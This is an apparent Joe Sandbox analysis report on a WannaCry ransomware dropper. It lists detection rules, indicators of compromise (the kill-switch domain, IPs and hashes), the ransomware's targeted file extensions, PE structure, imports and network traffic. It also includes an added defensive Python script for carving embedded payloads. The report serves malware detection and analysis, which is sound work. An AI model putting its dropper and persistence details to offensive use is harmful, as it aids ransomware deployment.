Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: THN6clTA6P.exe | Binary or memory string: OriginalFilenamediskpart.exej% vs THN6clTA6P.exe
Source: THN6clTA6P.exe | Binary or memory string: OriginalFilenamelhdfrgui.exej% vs THN6clTA6P.exe
Source: THN6clTA6P.exe | Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: THN6clTA6P.exe | Virustotal: Detection: 88%
Source: THN6clTA6P.exe | Metadefender: Detection: 89%
Source: THN6clTA6P.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,1_2_00408090
Source: THN6clTA6P.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: 1_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: 1_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,1_2_00407CE0
Source: THN6clTA6P.exe | Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: classification engine | Classification label: mal100.rans.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
Source: C:\Users\user\Desktop\THN6clTA6P.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: THN6clTA6P.exe | Static file information: File size 3723293 > 1048576
Source: THN6clTA6P.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: 1_2_00409860 push eax; ret 1_2_0040988E
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_1-1145
Source: C:\Users\user\Desktop\THN6clTA6P.exe | API coverage: 9.3 %
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,LocalFree,inet_addr,inet_addr,inet_addr,htonl,htonl,htonl,htonl,GetPerAdapterInfo,LocalAlloc,GetPerAdapterInfo,inet_addr,htonl,htonl,htonl,htonl,LocalFree,LocalFree,1_2_00409160
Source: C:\Users\user\Desktop\THN6clTA6P.exe | API call chain: ExitProcess graph end node graph_1-1309
Source: THN6clTA6P.exe, 00000001.00000002.266409095.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, THN6clTA6P.exe, 00000001.00000002.266400087.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
MITRE ATT&CK matrix (the number in parentheses is the count of matched signatures for that technique; unnumbered entries are the matrix's unmatched placeholder techniques):
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Service Execution (2); Scheduled Task/Job; At (Linux); At (Windows)
Persistence: Windows Service (4); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Windows Service (4); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Software Packing (1); Obfuscated Files or Information (1); Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery (1); System Information Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (2); Ingress Tool Transfer (12)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data
Source | Detection | Scanner | Label | Link
THN6clTA6P.exe | 89% | Virustotal | | Browse
THN6clTA6P.exe | 89% | Metadefender | | Browse
THN6clTA6P.exe | 100% | ReversingLabs | Win32.Ransomware.WannaCry |
THN6clTA6P.exe | 100% | Avira | TR/Ransom.IZ |
THN6clTA6P.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
1.2.THN6clTA6P.exe.7100a4.1.unpack | 100% | Avira | TR/Ransom.JB | | Download File
1.2.THN6clTA6P.exe.400000.0.unpack | 100% | Avira | TR/Ransom.JB | | Download File
1.0.THN6clTA6P.exe.7100a4.1.unpack | 100% | Avira | TR/Ransom.JB | | Download File
1.0.THN6clTA6P.exe.400000.0.unpack | 100% | Avira | TR/Ransom.JB | | Download File
Source | Detection | Scanner | Label | Link
www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 6% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | 6% | Virustotal | | Browse
http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | 100% | Avira URL Cloud | malware |
http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 6% | Virustotal | | Browse
http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.21.68.165 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | true | 6% Virustotal (Browse); Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | THN6clTA6P.exe | true | 6% Virustotal (Browse); Avira URL Cloud: malware | unknown
Reputation scale: No. of IPs < 25% / 25% < No. of IPs < 50% / 50% < No. of IPs < 75% / 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.68.165 | www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | United States | 13335 | CLOUDFLARENET US | true
          Joe Sandbox Version:35.0.0 Citrine
          Analysis ID:694554
          Start date and time:2022-08-31 23:45:45 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 27s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:THN6clTA6P.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 19
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.winEXE@1/0@1/1
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 100% (good quality ratio 93.3%)
          • Quality average: 78.1%
          • Quality standard deviation: 28.8%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 3
          • Number of non-executed functions: 24
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Adjust boot time
          • Enable AMSI
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
104.21.68.165 | XKMllmtgC6.exe | Get hash | malicious | Browse | www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
104.21.68.165 | TD2iJVEasE.exe | Get hash | malicious | Browse | www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
104.21.68.165 | G6wYYSew1q.dll | Get hash | malicious | Browse | www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | TD2iJVEasE.exe | Get hash | malicious | Browse | 104.21.68.165
www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | G6wYYSew1q.dll | Get hash | malicious | Browse | 104.21.68.165
www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Rmz4QnOp0z.dll | Get hash | malicious | Browse | 172.67.196.228
www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | w.exe | Get hash | malicious | Browse | 172.106.0.71
www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 7.exe | Get hash | malicious | Browse | 172.106.0.71
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
CLOUDFLARENET US | https://rfp-skytech.myportfolio.com/ | Get hash | malicious | Browse | 104.18.11.207
CLOUDFLARENET US | INV_PackingL_202208031_0104.exe | Get hash | malicious | Browse | 104.19.185.120
CLOUDFLARENET US | fraiche_0831003.js | Get hash | malicious | Browse | 162.159.135.233
CLOUDFLARENET US | file.exe | Get hash | malicious | Browse | 188.114.97.3
CLOUDFLARENET US | PURCHASE ORDER.exe | Get hash | malicious | Browse | 188.114.97.3
CLOUDFLARENET US | FedEx.exe | Get hash | malicious | Browse | 188.114.96.3
CLOUDFLARENET US | E-dekont.exe | Get hash | malicious | Browse | 23.227.38.74
CLOUDFLARENET US | quotation.exe | Get hash | malicious | Browse | 104.19.185.120
CLOUDFLARENET US | 22D1530H.exe | Get hash | malicious | Browse | 162.159.135.233
CLOUDFLARENET US | aZRjd3RCg7.exe | Get hash | malicious | Browse | 104.19.185.120
CLOUDFLARENET US | 1bvMFh26BM.exe | Get hash | malicious | Browse | 104.19.184.120
CLOUDFLARENET US | STEEL-GI PHOTO FROM SMC STEEL GROUP CO.xlsx | Get hash | malicious | Browse | 104.19.185.120
CLOUDFLARENET US | http://gogoanime.run | Get hash | malicious | Browse | 104.17.25.14
CLOUDFLARENET US | E-tender 05-2022-Post Tender Clarification Form-Ms. NAFAL CONTRACTING TRADING CO LLC.xlsx | Get hash | malicious | Browse | 104.19.185.120
CLOUDFLARENET US | ESTADO DE CUENTA DHL - 1606561674.exe | Get hash | malicious | Browse | 104.19.184.120
CLOUDFLARENET US | Swift_010TRF-20223108.exe | Get hash | malicious | Browse | 104.19.184.120
CLOUDFLARENET US | Ordem de compra.exe | Get hash | malicious | Browse | 104.19.184.120
CLOUDFLARENET US | Nova ordem.exe | Get hash | malicious | Browse | 104.19.184.120
CLOUDFLARENET US | https://sharepointeln-online.mfs.gg/aswm47B | Get hash | malicious | Browse | 172.67.74.85
CLOUDFLARENET US | Egacid2z8g.exe | Get hash | malicious | Browse | 104.19.185.120
          No context
          No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.964259281750754
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:THN6clTA6P.exe
          File size:3723293
          MD5:3983f0ebeec88b8005724a203ae27180
          SHA1:9f34d48eae30b6da0a5c5297a873f989a49e10e8
          SHA256:ed492db95034ca288dd52df88e3ce3ec7b146ffd854a394ac187f0553ef966d9
          SHA512:8e9956ad6ec1ef73a3555eaebc1efd2bf51a1794af2ee06d6fce2aace5e197d949fc27a2c8a89d224655db486f91c494e11235021a5238e81da3495f0b17d320
          SSDEEP:98304:whqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g30:whqPe1Cxcxk3ZAEUadzR8yc4gk
          TLSH:7B0633A8962DA1BCF0050DB044928557EBFB3C57B7BA5A2FCF4045660E43B6F9BC0E61
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..
          Icon Hash:00828e8e8686b000
          Entrypoint:0x409a16
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          DLL Characteristics:
          Time Stamp:0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:9ecee117164e0b870a53dd187cdd7174
          Instruction
          push ebp
          mov ebp, esp
          push FFFFFFFFh
          push 0040A1A0h
          push 00409BA2h
          mov eax, dword ptr fs:[00000000h]
          push eax
          mov dword ptr fs:[00000000h], esp
          sub esp, 68h
          push ebx
          push esi
          push edi
          mov dword ptr [ebp-18h], esp
          xor ebx, ebx
          mov dword ptr [ebp-04h], ebx
          push 00000002h
          call dword ptr [0040A0C0h]
          pop ecx
          or dword ptr [0070F894h], FFFFFFFFh
          or dword ptr [0070F898h], FFFFFFFFh
          call dword ptr [0040A0C8h]
          mov ecx, dword ptr [0070F88Ch]
          mov dword ptr [eax], ecx
          call dword ptr [0040A0CCh]
          mov ecx, dword ptr [0070F888h]
          mov dword ptr [eax], ecx
          mov eax, dword ptr [0040A0E4h]
          mov eax, dword ptr [eax]
          mov dword ptr [0070F890h], eax
          call 00007F77E0708F21h
          cmp dword ptr [00431410h], ebx
          jne 00007F77E0708E0Eh
          push 00409B9Eh
          call dword ptr [0040A0D4h]
          pop ecx
          call 00007F77E0708EF3h
          push 0040B010h
          push 0040B00Ch
          call 00007F77E0708EDEh
          mov eax, dword ptr [0070F884h]
          mov dword ptr [ebp-6Ch], eax
          lea eax, dword ptr [ebp-6Ch]
          push eax
          push dword ptr [0070F880h]
          lea eax, dword ptr [ebp-64h]
          push eax
          lea eax, dword ptr [ebp-70h]
          push eax
          lea eax, dword ptr [ebp-60h]
          push eax
          call dword ptr [0040A0DCh]
          push 0040B008h
          push 0040B000h
          call 00007F77E0708EABh
          Programming Language:
          • [C++] VS98 (6.0) SP6 build 8804
          • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa1e0 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x310000 | 0x35a454 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8bca | 0x9000 | False | 0.5344509548611112 | data | 6.134590828123831 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xa000 | 0x998 | 0x1000 | False | 0.29345703125 | data | 3.503615586181224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x30489c | 0x27000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x310000 | 0x35a454 | 0x35b000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
R | 0x3100a4 | 0x35a000 | PE32 executable (GUI) Intel 80386, for MS Windows | English | United States
RT_VERSION | 0x66a0a4 | 0x3b0 | data | English | United States
Note on the resource layout: resource R starts at RVA 0x3100a4 and is 0x35a000 bytes long, so it ends at 0x66a0a4, exactly where RT_VERSION begins; it therefore fills almost the whole 0x35b000-byte .rsrc section, which is why the static check above flags .rsrc as larger than 0x100000. With the image base of 0x400000 the resource is mapped at 0x7100a4, the address that appears in the "1.2.THN6clTA6P.exe.7100a4.1.unpack" entries of the antivirus table: the scanners are classifying the embedded PE32 payload, not only the outer dropper. The .data section's virtual size (0x30489c) is far larger than its raw size (0x27000), i.e. most of it is zero-filled at load time.
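The two static findings above (a .rsrc section over 1 MiB, and a resource that is itself a PE32 image) are the things a triage script should check for on a dropper of this shape. The following is an added example, not code from Joe Sandbox or from the sample: it parses the PE section table by hand (no pefile dependency), flags oversized sections against the report's 0x100000 threshold, and carves any embedded MZ/PE image out of the file by scanning for MZ headers whose e_lfanew points at a valid PE signature and sizing each hit from its own section table. It is exercised on a constructed two-section PE32 whose .rsrc holds a smaller PE at offset +0x80; every RVA, size and byte pattern in that fixture is invented for the test and is not taken from the sample.

```python
"""Static triage of a PE dropper that carries a second PE in its .rsrc section.

Added example, not Joe Sandbox code. The PE fixture built at the bottom is
constructed for the test and mimics only the layout described in the report.
"""
import struct
from collections import namedtuple

ONE_MIB = 0x100000        # threshold used by the report's "raw size of .rsrc" check
FILE_ALIGN = 0x200
Section = namedtuple("Section", "name vsize rva raw_size raw_off")


def parse_sections(data):
    """DOS header -> PE signature -> IMAGE_FILE_HEADER -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size            # first IMAGE_SECTION_HEADER
    out = []
    for i in range(nsections):
        name, vsize, rva, raw_size, raw_off = struct.unpack_from("<8sIIII", data, table + 40 * i)
        out.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), vsize, rva, raw_size, raw_off))
    return out


def file_extent(data):
    """On-disk size implied by the section table (end of the last raw section)."""
    return max((s.raw_off + s.raw_size for s in parse_sections(data)), default=0)


def oversized_sections(data, threshold=ONE_MIB):
    """Names of sections whose raw size exceeds the threshold."""
    return [s.name for s in parse_sections(data) if s.raw_size > threshold]


def carve_embedded_pe(data, start=1):
    """Return [(offset, bytes)] for every MZ/PE image found inside data.

    Scanning starts at 1 so the outer image's own header is skipped; after a
    hit the scan resumes past the carved image, so headers inside the payload
    are not reported twice. Candidates whose section table does not fit in
    the remaining bytes are ignored.
    """
    found, i = [], start
    while (i := data.find(b"MZ", i)) != -1:
        try:
            size = file_extent(data[i:])
        except (ValueError, struct.error):
            size = 0
        if 0 < size <= len(data) - i:
            found.append((i, data[i:i + size]))
            i += size
        else:
            i += 1
    return found


def triage(data):
    """Summary a triage script would emit for a dropper like the one in the report."""
    return {
        "sections": [(s.name, s.raw_off, s.raw_size) for s in parse_sections(data)],
        "oversized": oversized_sections(data),
        "embedded": [(off, len(blob)) for off, blob in carve_embedded_pe(data)],
    }


def _align(n, a=FILE_ALIGN):
    return (n + a - 1) // a * a


def build_pe(sections):
    """Constructed fixture: minimal PE32 (i386) with the given (name, raw bytes) sections."""
    n = len(sections)
    hdr_len = _align(0x40 + 4 + 20 + 0xE0 + 40 * n)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0xE0, 0x102)    # PE32 optional header size
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)
    table, bodies, raw_off, rva = b"", b"", hdr_len, 0x1000
    for name, raw in sections:
        raw += b"\0" * (_align(len(raw)) - len(raw))
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), rva, len(raw), raw_off, 0, 0, 0, 0, 0x40000040)
        bodies += raw
        raw_off += len(raw)
        rva += _align(len(raw), 0x1000)
    head = dos + b"PE\0\0" + coff + opt + table
    return head + b"\0" * (hdr_len - len(head)) + bodies


# Inner payload: one-section PE32, 0x400 bytes on disk.
INNER_PE = build_pe([(".text", b"\xCC" * 0x100)])
# Outer dropper: small .text plus a .rsrc just over 1 MiB with the payload at +0x80.
RSRC_BODY = b"\0" * 0x80 + INNER_PE + b"\0" * (0x100200 - 0x80 - len(INNER_PE))
SAMPLE_PE = build_pe([(".text", b"\x90" * 0x100), (".rsrc", RSRC_BODY)])

if __name__ == "__main__":
    print(triage(SAMPLE_PE))
```

On a real dropper you would feed the file bytes to `triage` and hash each carved blob; the carve sizes each hit from the embedded image's own section table rather than from the resource directory, so it also works when the resource entry lies about its size or the payload was appended outside .rsrc.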
DLL | Import
KERNEL32.dll | WaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
ADVAPI32.dll | StartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
WS2_32.dll | closesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
MSVCP60.dll | ??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
iphlpapi.dll | GetAdaptersInfo, GetPerAdapterInfo
WININET.dll | InternetOpenA, InternetOpenUrlA, InternetCloseHandle
MSVCRT.dll | __set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/31/22-23:46:48.979040 | UDP | 2024293 | ET TROJAN Possible WannaCry DNS Lookup 2 | 60625 | 53 | 192.168.2.3 | 8.8.8.8
08/31/22-23:46:49.148342 | TCP | 2016803 | ET TROJAN Known Sinkhole Response Header | 80 | 49746 | 104.21.68.165 | 192.168.2.3
TCP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2022 23:46:49.046582937 CEST | 49746 | 80 | 192.168.2.3 | 104.21.68.165
Aug 31, 2022 23:46:49.079365015 CEST | 80 | 49746 | 104.21.68.165 | 192.168.2.3
Aug 31, 2022 23:46:49.079502106 CEST | 49746 | 80 | 192.168.2.3 | 104.21.68.165
Aug 31, 2022 23:46:49.084465981 CEST | 49746 | 80 | 192.168.2.3 | 104.21.68.165
Aug 31, 2022 23:46:49.117137909 CEST | 80 | 49746 | 104.21.68.165 | 192.168.2.3
Aug 31, 2022 23:46:49.148341894 CEST | 80 | 49746 | 104.21.68.165 | 192.168.2.3
Aug 31, 2022 23:46:49.149030924 CEST | 49746 | 80 | 192.168.2.3 | 104.21.68.165
Aug 31, 2022 23:46:49.856214046 CEST | 49746 | 80 | 192.168.2.3 | 104.21.68.165
UDP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2022 23:46:48.979039907 CEST | 60625 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:46:49.004631042 CEST | 53 | 60625 | 8.8.8.8 | 192.168.2.3
DNS queries: Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 31, 2022 23:46:48.979039907 CEST | 192.168.2.3 | 8.8.8.8 | 0xb27c | Standard query (0) | www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
DNS answers: Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 31, 2022 23:46:49.004631042 CEST | 8.8.8.8 | 192.168.2.3 | 0xb27c | No error (0) | www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.21.68.165 | A (IP address) | IN (0x0001)
Aug 31, 2022 23:46:49.004631042 CEST | 8.8.8.8 | 192.168.2.3 | 0xb27c | No error (0) | www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 172.67.196.228 | A (IP address) | IN (0x0001)
• www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
HTTP sessions: Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
